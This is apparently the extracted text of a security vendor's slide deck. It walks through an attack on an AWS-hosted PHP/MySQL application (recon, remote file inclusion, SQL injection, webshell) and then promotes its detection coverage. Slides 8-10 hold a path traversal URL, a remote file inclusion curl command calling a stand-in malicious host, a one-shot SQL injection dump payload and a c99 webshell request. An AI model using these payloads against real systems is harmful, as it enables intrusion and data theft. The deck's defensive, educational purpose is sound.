  • 7. Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. AWS services IAM, EC2, S3 EC2 instances EC2 instances VPC Route 53 Users Internet gateway ELB DB instance DB instance AvailabilityzoneAAvailabilityzoneB Auto scaling group Web App Server Auto scaling group S3 EC2 instances EC2 instances
  • 8. An attack scenario - Recon VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
  • 9. Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
  • 10. VPC Route 53 Internet gateway ELB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB S3 Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
  • 11. Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach Cloudtrail Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
  • 12. Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&C Cloudtrail Overall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see?
  • 13. Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 14. Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 15. Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection Cloudtrail Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  • 16. SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
  • 17. We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
  • 18. Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
  • 19. Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT